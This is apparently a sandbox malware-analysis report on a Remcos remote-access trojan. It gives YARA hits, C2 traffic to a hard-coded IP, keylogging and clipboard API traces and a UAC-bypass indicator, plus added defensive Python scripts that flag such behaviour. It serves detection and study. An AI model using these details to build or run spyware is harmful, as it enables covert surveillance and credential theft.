Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

Source: Yara match; File source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR

                  Privilege Escalation

Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_004074FD _wcslen,CoGetObject (the CoGetObject call that the Elevation:Administrator!new: moniker string in the Yara matches above is passed to)
Source: HUED23EDE5UGRFQ.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HUED23EDE5UGRFQ.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0044E879 FindFirstFileExA
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0040783C FindFirstFileW,FindNextFileW
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 4x nop then jmp 07AB431Fh (10_2_07AB3C21)
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 4x nop then jmp 07AB431Fh (10_2_07AB3CFA)

                  Networking

Source: Traffic; Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49712 -> 94.156.69.93:2973
Source: Traffic; Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.69.93:2973 -> 192.168.2.6:49712
Source: Malware configuration extractor; URLs: 94.156.69.93
Source: global traffic; TCP traffic: 192.168.2.6:49712 -> 94.156.69.93:2973
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache (no User-Agent header)
Source: Joe Sandbox View; IP Address: 178.237.33.50
Source: Joe Sandbox View; ASN Name: TERASYST-ASBG
Source: unknown; TCP traffic detected without corresponding DNS query: 94.156.69.93 (14 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe; Code function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: global traffic; DNS traffic detected: DNS query: geoplugin.net
Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001062000.00000004.00000020.00020000.00000000.sdmp, jdSldfVS.exe; String found in binary or memory: http://geoplugin.net/json.gp
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp/C
Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gpiiB
Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gpl
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2168229174.0000000002491000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2206237212.0000000003211000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HUED23EDE5UGRFQ.exe, jdSldfVS.exe.0.dr; String found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
Source: HUED23EDE5UGRFQ.exe, jdSldfVS.exe.0.dr; String found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
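Two of the network observations above are generic enough to hunt for without any Remcos-specific signature: the implant connects to a hard-coded IP on a non-standard port that no DNS answer ever returned (94.156.69.93:2973, fourteen times), while its one hostname lookup (geoplugin.net) is followed by an HTTP GET that carries no User-Agent header. The following is an added example, not Joe Sandbox output, that implements both checks over constructed records mirroring this run. The record classes, the COMMON_PORTS set, the 300-second correlation window and the assumption that geoplugin.net resolved to 178.237.33.50 (the IP the report lists, paired here for the sake of the sample) are this example's own.

```python
"""Network-side checks: connections with no prior DNS answer, and HTTP requests
with no User-Agent header (added example; records below are constructed)."""
from __future__ import annotations
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass
class DnsAnswer:
    ts: float
    qname: str
    answers: tuple[str, ...]


@dataclass
class Conn:
    ts: float
    src: str
    dst: str
    dport: int
    proto: str = "tcp"


@dataclass
class Alert:
    dst: str
    dport: int
    count: int
    nonstandard_port: bool
    first_seen: float


COMMON_PORTS = {22, 25, 80, 443, 587, 993, 995, 8080, 8443}


def find_unresolved(dns: list[DnsAnswer], conns: list[Conn], window: float = 300.0) -> list[Alert]:
    """One alert per (dst, port) contacted with no DNS answer for dst in the preceding window."""
    resolved: dict[str, list[float]] = {}
    for d in dns:
        for ip in d.answers:
            resolved.setdefault(ip, []).append(d.ts)
    hits: dict[tuple[str, int], Alert] = {}
    for c in conns:
        if c.dport == 53 or ip_address(c.dst).is_private:
            continue  # resolver traffic and internal hosts are out of scope
        if any(0 <= c.ts - t <= window for t in resolved.get(c.dst, [])):
            continue  # a DNS answer for this IP preceded the connection: expected shape
        key = (c.dst, c.dport)
        if key in hits:
            hits[key].count += 1  # repeated check-ins collapse into one alert with a counter
        else:
            hits[key] = Alert(c.dst, c.dport, 1, c.dport not in COMMON_PORTS, c.ts)
    return list(hits.values())


def missing_user_agent(raw_request: str) -> bool:
    """True when an HTTP/1.x request carries no User-Agent header (header names are case-insensitive)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    if not lines or not lines[0].startswith(("GET ", "POST ", "HEAD ", "PUT ")):
        raise ValueError("not an HTTP request line")
    return not any(line.lower().startswith("user-agent:") for line in lines[1:])


# Constructed records: sandbox host 192.168.2.6, one geoplugin.net lookup (assumed to
# answer 178.237.33.50), three C2 sessions with no lookup, and the resolver at 1.1.1.1.
SAMPLE_DNS = [DnsAnswer(100.0, "geoplugin.net", ("178.237.33.50",))]
SAMPLE_CONNS = [
    Conn(90.0, "192.168.2.6", "94.156.69.93", 2973),
    Conn(95.0, "192.168.2.6", "1.1.1.1", 53, "udp"),
    Conn(101.0, "192.168.2.6", "178.237.33.50", 80),
    Conn(150.0, "192.168.2.6", "94.156.69.93", 2973),
    Conn(210.0, "192.168.2.6", "94.156.69.93", 2973),
]
# The request exactly as the report shows it: no User-Agent line at all.
SAMPLE_REQUEST = "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n\r\n"

if __name__ == "__main__":
    for a in find_unresolved(SAMPLE_DNS, SAMPLE_CONNS):
        print(f"{a.dst}:{a.dport} x{a.count} nonstandard={a.nonstandard_port} first={a.first_seen}")
    print("User-Agent missing:", missing_user_agent(SAMPLE_REQUEST))
```

The DNS correlation is what gives the "TCP traffic detected without corresponding DNS query" line its weight: a hostname lookup followed by a connection to the returned address is normal client behaviour, whereas a direct-to-IP session on port 2973 with no lookup anywhere in the window is exactly the shape of a hard-coded C2. Caching resolvers and long TTLs mean the window needs tuning per environment; a too-short window turns every cached lookup into a false positive.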

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 (idHook 0x0D = WH_KEYBOARD_LL, a low-level keyboard hook; the callback address 0x0040A2A4 lies inside the unpacked image at 0x00400000)
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Windows user hook set: 0 keyboard low level (global low-level keyboard hook installed from the initial sample's process)
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard (clipboard read)
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard (clipboard write followed by a read-back)
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx (keystroke-to-character translation for the layout of the foreground window's thread: the keylogger's decode loop)
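The four "Code function" traces above are enough to derive the keylogger and clipboard-capture verdicts mechanically. The following is an added triage helper, not Joe Sandbox code and not part of the sample: it parses the trace lines exactly as printed in this section (function id, API names, and for SetWindowsHookExA the hex argument values), decodes the idHook argument against the winuser.h hook constants, and matches API sets against a small capability table. The capability labels and the API sets that define them are the author's choice for this example, not Joe Sandbox signature names.

```python
"""Added example, not Joe Sandbox code: turn the 'Code function' API traces above into
capability labels. REPORT_LINES are copied from this section of the report."""

# Hook identifiers from winuser.h (idHook, first argument of SetWindowsHookEx).
WH_HOOK_IDS = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}

# A capability fires when every API in its set appears in one function's trace.
API_PATTERNS = [
    ("clipboard read", {"OpenClipboard", "GetClipboardData"}),
    ("clipboard write", {"OpenClipboard", "SetClipboardData"}),
    ("keystroke decoding", {"GetKeyboardState", "ToUnicodeEx"}),
    ("active window tagging", {"GetForegroundWindow", "GetWindowThreadProcessId"}),
]

# Copied from the report section above (function id, then the trace Joe printed).
REPORT_LINES = [
    "17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000",
    "17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard",
    "17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,"
    "SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard",
    "17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,"
    "GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx",
]


def parse_line(line):
    """Split '<func_id> <trace>' into (func_id, [apis], [hex args]).
    Joe prints either 'API arg1,arg2,...' (one API with resolved arguments)
    or 'API1,API2,...' (a call sequence without arguments)."""
    func_id, _, trace = line.strip().partition(" ")
    head, _, tail = trace.partition(" ")
    if tail:
        return func_id, [head], tail.split(",")
    return func_id, trace.split(","), []


def classify(line):
    """Return (func_id, [capability labels]) for one trace line."""
    func_id, apis, args = parse_line(line)
    labels = []
    if apis[0] in ("SetWindowsHookExA", "SetWindowsHookExW") and args:
        id_hook = int(args[0], 16)           # first argument is idHook
        name = WH_HOOK_IDS.get(id_hook, f"WH_{id_hook}")
        if id_hook in (2, 13):
            labels.append(f"keyboard hook ({name})")
        elif id_hook in (7, 14):
            labels.append(f"mouse hook ({name})")
        else:
            labels.append(f"window hook ({name})")
    present = set(apis)
    for label, needed in API_PATTERNS:
        if needed <= present:
            labels.append(label)
    return func_id, labels


def triage(lines):
    """Map every function id to its capability labels."""
    return dict(classify(line) for line in lines)


def is_keylogger(triaged):
    """Verdict: a keyboard hook plus keystroke-to-text decoding somewhere in the binary."""
    all_labels = {label for labels in triaged.values() for label in labels}
    return any(label.startswith("keyboard hook") for label in all_labels) \
        and "keystroke decoding" in all_labels


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    for func_id, labels in result.items():
        print(func_id, "->", ", ".join(labels) or "no capability matched")
    print("keylogger:", is_keylogger(result))
```

The hook rule keys on the idHook value rather than on the API name alone because SetWindowsHookEx is also used by benign UI code (WH_CBT, WH_GETMESSAGE); only the keyboard and mouse hook types, combined with GetKeyboardState plus ToUnicodeEx in another function, justify the keylogger label.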

                  E-Banking Fraud

Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041C9E2 SystemParametersInfoW (desktop wallpaper change)

                  System Summary

Matched YARA rules (full rule metadata is listed further down in this section):
  [A] Windows_Trojan_Remcos_b296e965
  [B] REMCOS_RAT_variants
  [C] INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM: detects Windows executables bypassing UAC using CMSTP COM interfaces, MITRE T1218.003 (author: ditekSHen)
Source | type | rules matched
  17.2.jdSldfVS.exe.400000.0.raw.unpack | UNPACKEDPE | A, B, C
  10.2.jdSldfVS.exe.42782c0.2.unpack | UNPACKEDPE | A, B, C
  0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack | UNPACKEDPE | A, B, C
  17.2.jdSldfVS.exe.400000.0.unpack | UNPACKEDPE | A, B, C
  0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack | UNPACKEDPE | A, B, C
  10.2.jdSldfVS.exe.42f0ce0.3.unpack | UNPACKEDPE | A, B, C
  0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack | UNPACKEDPE | A, C
  0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack | UNPACKEDPE | A, C
  10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack | UNPACKEDPE | A, C
  10.2.jdSldfVS.exe.42782c0.2.raw.unpack | UNPACKEDPE | A, C
  00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MEMORY | A, B, C
  00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp | MEMORY | A
  0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp | MEMORY | A
  Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820 | MEMORYSTR | A
  Process Memory Space: jdSldfVS.exe PID: 6124 | MEMORYSTR | A
  Process Memory Space: jdSldfVS.exe PID: 6996 | MEMORYSTR | A
Source: initial sample | Static PE information: Filename: HUED23EDE5UGRFQ.exe
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress (logoff/shutdown/reboot capability, with the import resolved at run time)
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Code functions: 0_2_049E027C, 0_2_049E9A08, 0_2_049E0448, 0_2_049E0DF8, 0_2_049E0E08, 0_2_049E29B0, 0_2_049E99F8, 0_2_06A2E738, 0_2_06A2E748, 0_2_06A2E2FF, 0_2_06A263E8, 0_2_06A263DA, 0_2_06A2E310, 0_2_06A2DED8, 0_2_06A2DAA0
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code functions: 10_2_0572027C, 10_2_05729A08, 10_2_05720448, 10_2_05720DF8, 10_2_05720E08, 10_2_057229B0, 10_2_057299F8, 10_2_057F63D8, 10_2_057F6347, 10_2_057F63D1, 10_2_07AB5258, 10_2_07AB7548, 10_2_07AB0007, 10_2_07AB0040
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code functions: 17_2_0043E0CC, 17_2_0041F0FA, 17_2_00454159, 17_2_00438168, 17_2_004461F0, 17_2_0043E2FB, 17_2_0045332B, 17_2_0042739D, 17_2_004374E6, 17_2_0043E558, 17_2_00438770, 17_2_004378FE, 17_2_00433946, 17_2_0044D9C9, 17_2_00427A46, 17_2_0041DB62, 17_2_00427BAF, 17_2_00437D33, 17_2_00435E5E, 17_2_00426E0E, 17_2_0043DE9D, 17_2_00413FCA, 17_2_00436FEA
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: String function: 00434E10 appears 54 times
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: String function: 00434770 appears 41 times
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: String function: 00401E65 appears 34 times
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2173388823.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe, 00000000.00000000.2118623343.000000000013E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2162131813.000000000072E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2173416724.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2174742533.00000000075C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe | Binary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
Source: HUED23EDE5UGRFQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Rule metadata for the three matched rules (the sources each rule fired on are the same as in the match listing at the top of this section):
  Windows_Trojan_Remcos_b296e965: reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23. Fired on all sixteen sources: the ten unpacked PEs, the three memory dumps (process 17 at 0x00400000, process 0 at 0x034F6000, process 10 at 0x04278000) and the process memory spaces of PIDs 2820, 6124 and 6996.
  REMCOS_RAT_variants: Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda. Fired on 17.2.jdSldfVS.exe.400000.0.raw.unpack, 10.2.jdSldfVS.exe.42782c0.2.unpack, 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, 17.2.jdSldfVS.exe.400000.0.unpack, 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, 10.2.jdSldfVS.exe.42f0ce0.3.unpack and the process 17 memory dump at 0x00400000.
  INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM: author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003). Fired on all ten unpacked PEs and the process 17 memory dump at 0x00400000.
Source: HUED23EDE5UGRFQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jdSldfVS.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, DSSwTQO1NWXixqGlCL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: _0020.AddAccessRule
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, DSSwTQO1NWXixqGlCL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.75c0000.6.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: _0020.AddAccessRule
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, DSSwTQO1NWXixqGlCL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HUED23EDE5UGRFQ.exe.3965450.0.raw.unpack, ihbe3xiO3YppFp0VLe.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@23/17@1/2
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00417952
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F474
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B4A8
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | File created: C:\Users\user\AppData\Roaming\jdSldfVS.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Mutant created: \Sessions\1\BaseNamedObjects\donmtwtGg
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
